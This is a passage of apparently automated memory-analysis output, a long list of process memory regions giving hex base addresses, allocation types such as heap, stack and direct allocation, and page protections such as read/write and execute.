page execute and read and write
|
||
47D0000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
2B9C2610000
|
heap
|
page read and write
|
||
1BB1000
|
heap
|
page read and write
|
||
FC1000
|
unkown
|
page execute read
|
||
4D1F000
|
stack
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
4AEE000
|
stack
|
page read and write
|
||
1B778330000
|
heap
|
page read and write
|
||
7FF712291000
|
unkown
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
540000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
3AF000
|
unkown
|
page execute and write copy
|
||
2B9C2310000
|
heap
|
page read and write
|
||
700F000
|
stack
|
page read and write
|
||
26810958000
|
heap
|
page read and write
|
||
454F000
|
stack
|
page read and write
|
||
1E365843000
|
heap
|
page read and write
|
||
D9E000
|
heap
|
page read and write
|
||
54F0000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF69F040000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
56A1000
|
trusted library allocation
|
page read and write
|
||
1FE60F30000
|
heap
|
page read and write
|
||
445E000
|
stack
|
page read and write
|
||
16C0000
|
direct allocation
|
page read and write
|
||
140739000
|
unkown
|
page readonly
|
||
1294000
|
heap
|
page read and write
|
||
5F096FE000
|
stack
|
page read and write
|
||
355F000
|
stack
|
page read and write
|
||
341F000
|
stack
|
page read and write
|
||
1EA2D1F0000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
1E36583D000
|
heap
|
page read and write
|
||
DE7000
|
unkown
|
page execute and write copy
|
||
90F000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
2743F850000
|
heap
|
page read and write
|
||
1F2E000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
15BE000
|
stack
|
page read and write
|
||
5699000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
499E000
|
stack
|
page read and write
|
||
D79000
|
unkown
|
page execute and write copy
|
||
4DCB000
|
stack
|
page read and write
|
||
2B9C23D8000
|
heap
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
154A000
|
heap
|
page read and write
|
||
8C14000
|
heap
|
page read and write
|
||
79585FB000
|
stack
|
page read and write
|
||
1752000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
3BF000
|
unkown
|
page execute and read and write
|
||
566C000
|
trusted library allocation
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
306000
|
unkown
|
page read and write
|
||
56D2000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
268125C2000
|
heap
|
page read and write
|
||
15B3000
|
heap
|
page read and write
|
||
396D000
|
stack
|
page read and write
|
||
A9C19AC000
|
stack
|
page read and write
|
||
369F000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
20CD000
|
trusted library allocation
|
page execute and read and write
|
||
310E000
|
stack
|
page read and write
|
||
216F000
|
stack
|
page read and write
|
||
1D566AA0000
|
heap
|
page read and write
|
||
17A2000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
20453120000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
36DE000
|
stack
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page write copy
|
||
268109DE000
|
heap
|
page read and write
|
||
B3D000
|
stack
|
page read and write
|
||
26810960000
|
heap
|
page read and write
|
||
3B9F000
|
stack
|
page read and write
|
||
1305EFC000
|
stack
|
page read and write
|
||
604F000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
D42000
|
heap
|
page read and write
|
||
2681096A000
|
heap
|
page read and write
|
||
B60000
|
heap
|
page read and write
|
||
16E0000
|
direct allocation
|
page read and write
|
||
1F06000
|
heap
|
page read and write
|
||
2006ED80000
|
heap
|
page read and write
|
||
7700000
|
direct allocation
|
page execute and read and write
|
||
14FF000
|
stack
|
page read and write
|
||
5661000
|
trusted library allocation
|
page read and write
|
||
4CE0000
|
direct allocation
|
page execute and read and write
|
||
4DC0000
|
heap
|
page read and write
|
||
1E365820000
|
heap
|
page read and write
|
||
598F000
|
stack
|
page read and write
|
||
1FDED780000
|
direct allocation
|
page read and write
|
||
5460000
|
direct allocation
|
page execute and read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
DE9000
|
unkown
|
page execute and write copy
|
||
706C000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
17C6000
|
heap
|
page read and write
|
||
1D94EF10000
|
direct allocation
|
page read and write
|
||
1B778310000
|
heap
|
page read and write
|
||
268109CF000
|
heap
|
page read and write
|
||
45F000
|
unkown
|
page execute and read and write
|
||
1E3657A0000
|
trusted library allocation
|
page read and write
|
||
359E000
|
stack
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
1D94D550000
|
heap
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
30D000
|
unkown
|
page readonly
|
||
DBA000
|
unkown
|
page execute and read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
28D0000
|
heap
|
page read and write
|
||
1E365836000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
3D1D000
|
stack
|
page read and write
|
||
4561A7F000
|
stack
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
26810983000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
28CE000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
1E365831000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1D4E000
|
stack
|
page read and write
|
||
1E365750000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1504000
|
heap
|
page read and write
|
||
52CF000
|
stack
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
3A9E000
|
stack
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1E365822000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4C50000
|
direct allocation
|
page execute and read and write
|
||
C80000
|
unkown
|
page readonly
|
||
C34000
|
heap
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
6174000
|
trusted library allocation
|
page read and write
|
||
D68000
|
unkown
|
page execute and write copy
|
||
44CF000
|
stack
|
page read and write
|
||
32000
|
unkown
|
page readonly
|
||
D0E000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
36E000
|
unkown
|
page execute and write copy
|
||
7011000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
1EFF000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
3D4F000
|
stack
|
page read and write
|
||
D9E000
|
heap
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
1789000
|
heap
|
page read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
56BC000
|
trusted library allocation
|
page read and write
|
||
1E365837000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
4C00000
|
direct allocation
|
page execute and read and write
|
||
26810990000
|
heap
|
page read and write
|
||
4BF0000
|
direct allocation
|
page execute and read and write
|
||
1770000
|
remote allocation
|
page read and write
|
||
5696000
|
trusted library allocation
|
page read and write
|
||
569E000
|
trusted library allocation
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
1E36582A000
|
heap
|
page read and write
|
||
B59000
|
unkown
|
page read and write
|
||
2EDF000
|
stack
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
447000
|
unkown
|
page execute and write copy
|
||
7011000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
4A90000
|
direct allocation
|
page read and write
|
||
3F0F000
|
stack
|
page read and write
|
||
289000
|
unkown
|
page readonly
|
||
45E000
|
unkown
|
page execute and write copy
|
||
26810975000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
268109DD000
|
heap
|
page read and write
|
||
5664000
|
trusted library allocation
|
page read and write
|
||
5696000
|
trusted library allocation
|
page read and write
|
||
1E7E000
|
heap
|
page read and write
|
||
2D4E000
|
stack
|
page read and write
|
||
5675000
|
trusted library allocation
|
page read and write
|
||
56AD000
|
trusted library allocation
|
page read and write
|
||
1FB3D2C1000
|
heap
|
page read and write
|
||
7221000
|
heap
|
page read and write
|
||
1D90FDA0000
|
direct allocation
|
page read and write
|
||
348F000
|
stack
|
page read and write
|
||
2A6F000
|
stack
|
page read and write
|
||
56A3000
|
trusted library allocation
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
15A4000
|
heap
|
page read and write
|
||
15E7000
|
heap
|
page read and write
|
||
D2C000
|
heap
|
page read and write
|
||
3A5F000
|
stack
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
3F5F000
|
stack
|
page read and write
|
||
26810A1C000
|
heap
|
page read and write
|
||
DAA000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
130E000
|
stack
|
page read and write
|
||
1FB3D470000
|
heap
|
page read and write
|
||
77D0000
|
direct allocation
|
page execute and read and write
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
1D566ACA000
|
heap
|
page read and write
|
||
2681095B000
|
heap
|
page read and write
|
||
15EF000
|
heap
|
page read and write
|
||
56E0000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
9C1000
|
unkown
|
page execute and write copy
|
||
4601000
|
heap
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
4400000
|
direct allocation
|
page read and write
|
||
C61A6FD000
|
stack
|
page read and write
|
||
3ACF000
|
stack
|
page read and write
|
||
5665000
|
trusted library allocation
|
page read and write
|
||
148F000
|
unkown
|
page execute and read and write
|
||
15B3000
|
heap
|
page read and write
|
||
26FE000
|
stack
|
page read and write
|
||
1E36582D000
|
heap
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
12D0000
|
heap
|
page read and write
|
||
202A90D0000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
334F000
|
stack
|
page read and write
|
||
26810996000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
D78000
|
unkown
|
page execute and read and write
|
||
6E5DFCA000
|
stack
|
page read and write
|
||
1A302FE000
|
stack
|
page read and write
|
||
56A0000
|
trusted library allocation
|
page read and write
|
||
1E3657E0000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
30CF000
|
stack
|
page read and write
|
||
D8D000
|
heap
|
page read and write
|
||
A3E80FE000
|
stack
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
F4A000
|
heap
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
56E1000
|
trusted library allocation
|
page read and write
|
||
1D94D540000
|
heap
|
page read and write
|
||
35F000
|
unkown
|
page execute and read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
345E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5430000
|
direct allocation
|
page execute and read and write
|
||
3AE000
|
unkown
|
page execute and read and write
|
||
395000
|
unkown
|
page execute and write copy
|
||
CEC000
|
unkown
|
page write copy
|
||
4601000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
5C64000
|
trusted library allocation
|
page read and write
|
||
39CE000
|
stack
|
page read and write
|
||
28F0000
|
direct allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
268109CE000
|
heap
|
page read and write
|
||
CE2000
|
unkown
|
page execute and write copy
|
||
70D9AFE000
|
stack
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
7FF68FAC0000
|
unkown
|
page readonly
|
||
268125B0000
|
heap
|
page read and write
|
||
787D000
|
heap
|
page read and write
|
||
1F0F000
|
heap
|
page read and write
|
||
1DF0000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
11FC000
|
stack
|
page read and write
|
||
15FB000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5650000
|
heap
|
page read and write
|
||
20453200000
|
heap
|
page read and write
|
||
7FF69F041000
|
unkown
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
26810961000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
2F7C000
|
stack
|
page read and write
|
||
44F000
|
unkown
|
page execute and write copy
|
||
56A7000
|
trusted library allocation
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
6C5000
|
unkown
|
page execute and write copy
|
||
45F0000
|
direct allocation
|
page read and write
|
||
41DF000
|
stack
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
384F000
|
stack
|
page read and write
|
||
D21000
|
heap
|
page read and write
|
||
4D00000
|
direct allocation
|
page execute and read and write
|
||
DAF000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF69F4CF000
|
unkown
|
page read and write
|
||
35E000
|
unkown
|
page execute and write copy
|
||
7FF6BDA61000
|
unkown
|
page readonly
|
||
4C70000
|
direct allocation
|
page execute and read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
1B9000
|
unkown
|
page read and write
|
||
3F9E000
|
stack
|
page read and write
|
||
508F000
|
stack
|
page read and write
|
||
DFE000
|
stack
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
574F000
|
stack
|
page read and write
|
||
526E000
|
stack
|
page read and write
|
||
5697000
|
trusted library allocation
|
page read and write
|
||
34CE000
|
stack
|
page read and write
|
||
4700000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page read and write
|
||
15F9000
|
heap
|
page read and write
|
||
1E36584F000
|
heap
|
page read and write
|
||
C81000
|
unkown
|
page execute read
|
||
4E61000
|
heap
|
page read and write
|
||
320F000
|
stack
|
page read and write
|
||
372E000
|
stack
|
page read and write
|
||
674E000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1868DA00000
|
direct allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
7230000
|
heap
|
page read and write
|
||
377D000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
5E0F000
|
stack
|
page read and write
|
||
1E7A000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
170A000
|
heap
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
A3E7BFB000
|
stack
|
page read and write
|
||
4E7D000
|
stack
|
page read and write
|
||
D0D000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
B59000
|
unkown
|
page write copy
|
||
7011000
|
heap
|
page read and write
|
||
76E0000
|
direct allocation
|
page execute and read and write
|
||
26810977000
|
heap
|
page read and write
|
||
460000
|
unkown
|
page execute and write copy
|
||
5666000
|
trusted library allocation
|
page read and write
|
||
7FF69F4CF000
|
unkown
|
page write copy
|
||
248C0630000
|
heap
|
page read and write
|
||
43CE000
|
stack
|
page read and write
|
||
56D1000
|
trusted library allocation
|
page read and write
|
||
1D566A05000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
1AB4A1C0000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
7A90000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
1504000
|
heap
|
page read and write
|
||
A9C1CFE000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1B2000
|
unkown
|
page execute and read and write
|
||
C34000
|
heap
|
page read and write
|
||
26810974000
|
heap
|
page read and write
|
||
70D972C000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
306000
|
unkown
|
page write copy
|
||
17B0000
|
heap
|
page read and write
|
||
567B000
|
trusted library allocation
|
page read and write
|
||
1E3661EF000
|
heap
|
page read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
1E365829000
|
heap
|
page read and write
|
||
1EA2CFE0000
|
heap
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
17B6000
|
heap
|
page read and write
|
||
B52000
|
unkown
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
1E36585C000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2110000
|
heap
|
page read and write
|
||
2743DE70000
|
heap
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
46DF000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1868DA10000
|
heap
|
page read and write
|
||
7801000
|
heap
|
page read and write
|
||
1E365891000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
177E000
|
heap
|
page read and write
|
||
17CA000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
57F0000
|
heap
|
page read and write
|
||
569C000
|
trusted library allocation
|
page read and write
|
||
141000
|
unkown
|
page execute read
|
||
4E61000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1703000
|
direct allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
1D94D590000
|
heap
|
page read and write
|
||
D4C000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
5721000
|
trusted library allocation
|
page read and write
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
32DF000
|
stack
|
page read and write
|
||
F2E000
|
stack
|
page read and write
|
||
3BA000
|
unkown
|
page execute and write copy
|
||
434E000
|
stack
|
page read and write
|
||
1FF000
|
unkown
|
page readonly
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
3F9E000
|
stack
|
page read and write
|
||
1E365865000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
2681096A000
|
heap
|
page read and write
|
||
26810974000
|
heap
|
page read and write
|
||
268109BA000
|
heap
|
page read and write
|
||
3BEF000
|
stack
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
1FB3D2A0000
|
heap
|
page read and write
|
||
45DE000
|
stack
|
page read and write
|
||
A3E7FFF000
|
stack
|
page read and write
|
||
3DA000
|
unkown
|
page execute and read and write
|
||
567F000
|
trusted library allocation
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2A1000
|
unkown
|
page execute read
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
56F1000
|
trusted library allocation
|
page read and write
|
||
1F0F000
|
heap
|
page read and write
|
||
459F000
|
stack
|
page read and write
|
||
D47000
|
heap
|
page read and write
|
||
338E000
|
stack
|
page read and write
|
||
D8A000
|
heap
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
2B9C2360000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
6CBC000
|
stack
|
page read and write
|
||
331E000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2210000
|
heap
|
page execute and read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
395000
|
unkown
|
page execute and write copy
|
||
20453220000
|
heap
|
page read and write
|
||
C46000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
3BDE000
|
stack
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
7FF69F041000
|
unkown
|
page execute and read and write
|
||
120F000
|
stack
|
page read and write
|
||
9E15FFF000
|
stack
|
page read and write
|
||
1622000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
43AE000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
20D7000
|
trusted library allocation
|
page execute and read and write
|
||
36F000
|
unkown
|
page execute and read and write
|
||
5698000
|
trusted library allocation
|
page read and write
|
||
7A7A000
|
heap
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
26810964000
|
heap
|
page read and write
|
||
1E3658C4000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
3EAE000
|
stack
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
5686000
|
trusted library allocation
|
page read and write
|
||
268109A2000
|
heap
|
page read and write
|
||
A9C1DFE000
|
stack
|
page read and write
|
||
2260000
|
direct allocation
|
page execute read
|
||
3C2E000
|
stack
|
page read and write
|
||
8BFA000
|
heap
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
EEF000
|
stack
|
page read and write
|
||
268109BA000
|
heap
|
page read and write
|
||
1E36582C000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
CEC000
|
unkown
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
56C0000
|
trusted library allocation
|
page read and write
|
||
7FF6BD9D1000
|
unkown
|
page execute read
|
||
4600000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2C0F000
|
stack
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
C81000
|
unkown
|
page execute read
|
||
5907000
|
trusted library allocation
|
page read and write
|
||
5687000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
16E0000
|
direct allocation
|
page read and write
|
||
A3E78FE000
|
stack
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
7011000
|
heap
|
page read and write
|
||
36EF000
|
stack
|
page read and write
|
||
26812590000
|
remote allocation
|
page read and write
|
||
7A6C000
|
direct allocation
|
page read and write
|
||
1E3658C2000
|
heap
|
page read and write
|
||
5693000
|
trusted library allocation
|
page read and write
|
||
4C60000
|
direct allocation
|
page execute and read and write
|
||
C80000
|
unkown
|
page readonly
|
||
5675000
|
trusted library allocation
|
page read and write
|
||
5670000
|
trusted library allocation
|
page read and write
|
||
13F5000
|
heap
|
page read and write
|
||
14042E000
|
unkown
|
page read and write
|
||
D9A000
|
heap
|
page read and write
|
||
1FE60CA9000
|
heap
|
page read and write
|
||
20454C15000
|
heap
|
page read and write
|
||
1FDEBBD0000
|
heap
|
page read and write
|
||
1868F3F0000
|
direct allocation
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
CC0000
|
heap
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
7010000
|
heap
|
page read and write
|
||
26810A08000
|
heap
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
27FF000
|
stack
|
page read and write
|
||
1BFB000
|
stack
|
page read and write
|
||
2032D640000
|
heap
|
page read and write
|
||
566C000
|
trusted library allocation
|
page read and write
|
||
1F13000
|
heap
|
page read and write
|
||
D43000
|
heap
|
page read and write
|
||
334000
|
unkown
|
page execute and read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
46F1000
|
heap
|
page read and write
|
||
1B9000
|
unkown
|
page write copy
|
||
49CF000
|
stack
|
page read and write
|
||
D70000
|
unkown
|
page execute and read and write
|
||
342000
|
unkown
|
page execute and write copy
|
||
578E000
|
stack
|
page read and write
|
||
1611000
|
heap
|
page read and write
|
||
7FF69F311000
|
unkown
|
page execute and write copy
|
||
1EA2D6A0000
|
trusted library allocation
|
page read and write
|
||
1294000
|
heap
|
page read and write
|
||
3A6E000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
1D94F040000
|
direct allocation
|
page read and write
|
||
5674000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
A52BCFE000
|
stack
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
70D9BFE000
|
stack
|
page read and write
|
||
45EF000
|
stack
|
page read and write
|
||
5450000
|
direct allocation
|
page execute and read and write
|
||
17F0000
|
direct allocation
|
page read and write
|
||
5669000
|
trusted library allocation
|
page read and write
|
||
ECE000
|
stack
|
page read and write
|
||
16B7019B000
|
heap
|
page read and write
|
||
16BF000
|
stack
|
page read and write
|
||
3D0000
|
unkown
|
page execute and read and write
|
||
50FC000
|
direct allocation
|
page read and write
|
||
439000
|
unkown
|
page execute and write copy
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
56E1000
|
trusted library allocation
|
page read and write
|
||
567C000
|
trusted library allocation
|
page read and write
|
||
1A2FEFC000
|
stack
|
page read and write
|
||
7871000
|
heap
|
page read and write
|
||
337000
|
unkown
|
page execute and read and write
|
||
62CE000
|
stack
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
76D0000
|
direct allocation
|
page execute and read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
1E365865000
|
heap
|
page read and write
|
||
D0F000
|
heap
|
page read and write
|
||
722E000
|
heap
|
page read and write
|
||
6E5E3FF000
|
stack
|
page read and write
|
||
2800000
|
direct allocation
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
16B70435000
|
heap
|
page read and write
|
||
518F000
|
stack
|
page read and write
|
||
44F000
|
unkown
|
page execute and write copy
|
||
123B000
|
stack
|
page read and write
|
||
268109DE000
|
heap
|
page read and write
|
||
FCF000
|
stack
|
page read and write
|
||
2D0F000
|
stack
|
page read and write
|
||
15D0000
|
heap
|
page read and write
|
||
56BB000
|
trusted library allocation
|
page read and write
|
||
8FB000
|
stack
|
page read and write
|
||
56AC000
|
trusted library allocation
|
page read and write
|
||
2F1000
|
unkown
|
page readonly
|
||
1504000
|
heap
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
268109C0000
|
heap
|
page read and write
|
||
1D94D57B000
|
heap
|
page read and write
|
||
12A0000
|
heap
|
page read and write
|
||
567A000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
426E000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1305FFF000
|
stack
|
page read and write
|
||
550F000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1621000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
1B77837D000
|
heap
|
page read and write
|
||
56A2000
|
trusted library allocation
|
page read and write
|
||
FC0000
|
unkown
|
page readonly
|
||
5950000
|
heap
|
page read and write
|
||
202A90D8000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
CEF000
|
unkown
|
page readonly
|
||
20BD000
|
trusted library allocation
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
306000
|
unkown
|
page read and write
|
||
76F0000
|
direct allocation
|
page execute and read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1E365815000
|
heap
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
CCF000
|
unkown
|
page readonly
|
||
2E4F000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1F13000
|
heap
|
page read and write
|
||
56F1000
|
trusted library allocation
|
page read and write
|
||
57EE000
|
heap
|
page read and write
|
||
5E4E000
|
stack
|
page read and write
|
||
CEF000
|
